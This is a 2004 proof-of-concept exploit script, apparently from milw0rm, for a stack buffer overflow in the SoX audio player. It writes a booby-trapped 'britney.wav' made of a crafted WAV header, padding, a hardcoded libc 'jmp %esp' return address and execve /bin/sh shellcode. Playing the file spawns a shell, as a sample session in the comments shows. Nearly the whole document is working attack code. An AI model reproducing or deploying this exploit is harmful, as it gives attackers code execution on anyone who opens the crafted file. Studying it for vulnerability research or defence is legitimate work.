42 lines
No EOL
1.4 KiB
Raku
Executable file
42 lines
No EOL
1.4 KiB
Raku
Executable file
# POC Exploit for SoX Stack Overflow Vulnerability found by Ulf Harnhammar
|
|
# Tested Under Slackware 9.1
|
|
# Serkan Akpolat sakpolat@gmx.net | deicide@siyahsapka.org
|
|
# Homepage: http://deicide.siyahsapka.org
|
|
# Greets to: Virulent
|
|
# deicide@gate:~$ play britney.wav
|
|
# sh-2.05b$
|
|
|
|
# "jmp %esp" from libc.so , change this if needed..
|
|
retJmpEsp=0x4029824B
|
|
|
|
# intel_order() from MOSDEF
|
|
def intel_order(myint):
|
|
str=""
|
|
a=chr(myint % 256)
|
|
myint=myint >> 8
|
|
b=chr(myint % 256)
|
|
myint=myint >> 8
|
|
c=chr(myint % 256)
|
|
myint=myint >> 8
|
|
d=chr(myint % 256)
|
|
str+="%c%c%c%c" % (a,b,c,d)
|
|
return str
|
|
|
|
# Wave Header
|
|
begin = "\x52\x49\x46\x46\x74\x05\x00\x00\x57\x41\x56\x45\x66\x6d\x74\x20" +\
|
|
"\x32\x00\x00\x00\x02\x00\x01\x00\x70\x17\x00\x00\x00\x0c\x00\x00" +\
|
|
"\x00\x01\x04\x00\x20\x00\xf4\x01\x07\x00\x00\x01\x00\x00\x00\x02" +\
|
|
"\x00\xff\x00\x00\x00\x00\xc0\x00\x40\x00\xf0\x00\x00\x00\xcc\x01" +\
|
|
"\x30\xff\x88\x01\x18\xff\x66\x61\x63\x74\x04\x00\x00\x00\x00\x00" +\
|
|
"\x00\x00\x64\x61\x74\x61\x00\x00\x00\x00\x4c\x49\x53\x54\x9a\x01" +\
|
|
"\x00\x00\x49\x4e\x46\x4f\x49\x41\x52\x54\x08\x00\x00\x00\x44\x65" +\
|
|
"\x69\x63\x69\x64\x65\x00\x49\x43\x52\x44\x7e\x01\x00\x00"
|
|
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
|
|
|
|
evilBuf = begin+"boom"*75+intel_order(retJmpEsp)+shellcode
|
|
wavFile = open("britney.wav", "wb")
|
|
wavFile.write(evilBuf)
|
|
wavFile.close()
|
|
print "Evil Song has been created :Pp"
|
|
|
|
# milw0rm.com [2004-08-01] |